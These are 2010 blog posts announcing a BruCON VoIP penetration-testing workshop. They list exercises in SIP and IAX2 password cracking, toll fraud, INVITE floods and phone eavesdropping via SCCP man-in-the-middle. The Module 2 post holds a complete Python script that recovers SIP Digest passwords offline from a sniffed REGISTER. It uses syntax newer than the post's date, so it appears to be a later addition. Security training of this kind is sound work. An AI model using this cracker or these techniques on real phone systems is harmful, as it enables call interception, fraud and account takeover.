Showing posts with label voip penetration test.

Tuesday, September 7, 2010

BruCON Training: Module 4, Attacking Unified Communications

The final module in the upcoming pentesting VoIP crash course is the most exciting one. In this section we look at VoIP systems as a whole. "Unified communications" is one of those terms that has been hyped up to include everything, from chat to video calls and SMS. What we will look at in this section is how to go about breaking into the following during a penetration test:
  1. Web application security flaws in Asterisk-based PBX servers
  2. Attacking the various services exposed by PBX servers, such as TFTP
  3. How, once you are on a PBX network, you can sometimes simply use your phone to listen in on other phone calls
  4. How to make use of hardware taps
  5. Hardware phone features that can be abused
  6. Abuse of various features exposed on the HTTP server of Cisco CallManager

This module will familiarize the attendees with the target servers and systems. Who knows, it may even give a kick-start to finding some new 0-days in one of these Unified Communications solutions ;-)

Wednesday, September 1, 2010

BruCON Training: Module 2, Attacking signaling protocols

This is part of the BruCON VoIP security crash course training intro. For more information about the course and to secure a place, check out the BruCON website.

Most VoIP systems perform signaling using a protocol separate from the media transfer protocol. Signaling protocols allow VoIP systems to register, authenticate and set up phone calls, and they tend to carry a lot of intelligence with them. In this part of the training, Joffrey and I will talk you through the following signaling protocols and the attacks that apply to each of them:
  • SIP - an open standard
  • IAX2 - used by Asterisk PBX and compatible phones
  • SCCP (Skinny) - used by Cisco systems
  • MGCP - the media gateway control protocol, used between a call agent and the media gateways it controls
  • H.323 - found in gateways and older systems
The fun part? The exercises! We plan to use a hands-on approach rather than simply describe the protocols and attacks.

These are some of the practicals we have in store:

  1. Sniffing SIP, in order to understand how it all works and also to spy on the signaling and its metadata
  2. Scanning SIP, to see how we can identify SIP devices very quickly using SIPVicious and other tools
  3. SIP extension enumeration and online password cracking, to better understand how VoIP attackers are in fact making phone calls for free at the expense of their victims
  4. Toll fraud and how to avoid it, featuring the main ways attackers abuse SIP PBX servers out there
  5. INVITE floods, which are still an effective attack and can bring down various SIP-enabled devices
  6. Fuzzing SIP, the existing tools and their usage
  7. Using John the Ripper to crack SIP passwords, which also covers capturing the SIP authentication messages and patching John the Ripper to crack the digest
  8. Online and offline password cracking in IAX2, the tools and their usage
  9. Scanning IAX2, which allows us to find Asterisk servers
  10. MitM attacks using an SCCP proxy, which is a fun way of playing with the phones and can allow us to turn Cisco phones into remote spy bugs
  11. Capturing FAC (Forced Authorization Code) codes, a restriction commonly used in Cisco VoIP environments to allow or block international calls
  12. Call fraud with MGCP, since MGCP has little or no built-in security
  13. DoS on MGCP, or how to cause your VoIP gateway to go down
  14. RTP redirection, which can allow all sorts of fun (and sometimes profit)
  15. CallManager hijack (details later ;-))
With all these exercises we expect all the attendees to get really busy and gain useful experience with the signaling protocols.
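To make exercises 3 and 7 concrete, here is an added example of the offline half of SIP password cracking. This is my own illustration, not code from the course, from SIPVicious or from John the Ripper. SIP reuses HTTP Digest authentication: the phone answers a 401 challenge with `response = MD5(MD5(user:realm:password):nonce:MD5(method:uri))` (with `nc`, `cnonce` and `qop` mixed in when `qop=auth` is negotiated). Everything in that formula except the password is visible on the wire, so a sniffed REGISTER is enough for a dictionary attack. The captured message below is constructed inline to look like what a phone with the weak secret `201201` would send; the hostname, nonce and extension are made-up values.

```python
"""Offline dictionary attack on a sniffed SIP Digest authentication exchange.

Added example (not from the BruCON course, SIPVicious or John the Ripper).
The sample REGISTER is constructed inline; pbx.example.com, the nonce and
extension 201 are made-up values.
"""
import hashlib
import re


def md5hex(data: str) -> str:
    return hashlib.md5(data.encode()).hexdigest()


def digest_response(username, realm, password, method, uri, nonce,
                    qop=None, nc=None, cnonce=None):
    """RFC 2617 Digest 'response' as used by SIP (RFC 3261), MD5 algorithm."""
    ha1 = md5hex(f"{username}:{realm}:{password}")
    ha2 = md5hex(f"{method}:{uri}")
    if qop:  # qop=auth: client nonce count and cnonce are mixed in
        return md5hex(f"{ha1}:{nonce}:{nc}:{cnonce}:{qop}:{ha2}")
    return md5hex(f"{ha1}:{nonce}:{ha2}")


# name=value pairs, value either quoted or a bare token
_PARAM_RE = re.compile(r'(\w+)=("([^"]*)"|([^,\s]+))')


def parse_authorization(sip_message: str) -> dict:
    """Return the Digest parameters from the Authorization header of a SIP request."""
    for line in sip_message.split("\r\n"):
        if line.lower().startswith("authorization:"):
            value = line.partition(":")[2].strip()
            if not value.lower().startswith("digest "):
                raise ValueError("not Digest authentication")
            return {m.group(1): m.group(3) if m.group(3) is not None else m.group(4)
                    for m in _PARAM_RE.finditer(value[len("Digest "):])}
    raise ValueError("no Authorization header in message")


def crack_sip_digest(sip_message: str, wordlist):
    """Try every candidate password against the captured response; return the match or None."""
    method = sip_message.split(" ", 1)[0]        # request line: METHOD Request-URI SIP/2.0
    p = parse_authorization(sip_message)
    for candidate in wordlist:
        guess = digest_response(p["username"], p["realm"], candidate, method, p["uri"],
                                p["nonce"], p.get("qop"), p.get("nc"), p.get("cnonce"))
        if guess == p["response"]:
            return candidate
    return None


# --- constructed capture -------------------------------------------------
_USER, _REALM, _NONCE = "201", "asterisk", "1f7a3c2e"      # made-up values
_METHOD, _URI = "REGISTER", "sip:pbx.example.com"
_TRUE_PASSWORD = "201201"   # the weak secret we pretend the phone was provisioned with


def build_sample_register(password=_TRUE_PASSWORD) -> str:
    """The second REGISTER a phone sends after a 401 challenge, as a sniffer would see it."""
    resp = digest_response(_USER, _REALM, password, _METHOD, _URI, _NONCE)
    return ("REGISTER sip:pbx.example.com SIP/2.0\r\n"
            "Via: SIP/2.0/UDP 192.0.2.10:5060;branch=z9hG4bK776\r\n"
            "From: <sip:201@pbx.example.com>;tag=1928301774\r\n"
            "To: <sip:201@pbx.example.com>\r\n"
            "Call-ID: a84b4c76e66710\r\n"
            "CSeq: 2 REGISTER\r\n"
            f'Authorization: Digest username="{_USER}", realm="{_REALM}", '
            f'nonce="{_NONCE}", uri="{_URI}", response="{resp}", algorithm=MD5\r\n'
            "Content-Length: 0\r\n\r\n")


WORDLIST = ["password", "1234", "201", "asterisk", "201201", "secret"]

if __name__ == "__main__":
    print("recovered password:", crack_sip_digest(build_sample_register(), WORDLIST))
```

The only thing a real capture changes is where the message comes from: replace `build_sample_register()` with the REGISTER or INVITE text pulled out of a pcap. Because the nonce and `cnonce` are in the capture, cracking stays offline even when `qop=auth` is used, which is why numeric or extension-derived secrets fall in seconds.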

Tuesday, August 31, 2010

BruCON Training: Module 1, An Introduction to ...

An Introduction to VoIP technology, security threats and solutions, module 1. This module allows us to set the stage for the rest of the training. We will introduce the players - Asterisk, Cisco Unified Communications and other products. We will introduce the protocols briefly - SIP, SCCP (Skinny), IAX2, H.323 and MGCP. We will also look at how VLANs and other solutions are used to provide security (and where they fail).

We will then focus on security in terms of confidentiality, integrity and availability without going into too much detail (just to whet your appetite ;-)).

When it comes to VoIP, confidentiality ensures that the communications - phone calls and any signaling data - cannot be spied upon. Confidentiality is a major weakness in the case of many VoIP systems. One obvious security issue is when internal attackers spy on phone calls by sniffing the RTP stream. However this is not the only attack vector. We will give examples of tricks that can be pulled off by external attackers that allow them to compromise confidentiality remotely, without (layer 2) access to the network.

Caller ID spoofing, toll fraud and modification of signaling or media affect the integrity of the VoIP system. In this section we will look at these and various other security flaws that do not necessarily give attackers unauthorized access to confidential information. These flaws may however allow attackers to cause organizations to lose large sums of money.

Availability tends to be the security property whose loss affects organizations most directly. When the phone system is down, many organizations suffer. This is especially true for call centers, whose revenues depend on phone calls. With VoIP, attackers can abuse flaws at various levels to cause denial of service. In this section we will introduce some attacks that are specific to VoIP and others that affect systems in general.

Tuesday, June 8, 2010

A crashcourse in pentesting VOIP networks at BruCON 2010

Joffrey CZARNY and myself (Sandro) will be hosting a crash course at BruCON 2010. This will be a two day workshop on 22 & 23 September 2010. In a nutshell, we will help the attendees quickly get up to speed with VoIP networks and with performing security assessments of them. More information about the training can be found on the official page.

If you would like to register for the training go straight to the BruCON training registration page. Hope to see you there!

As always, I'll be glad to answer any questions by email.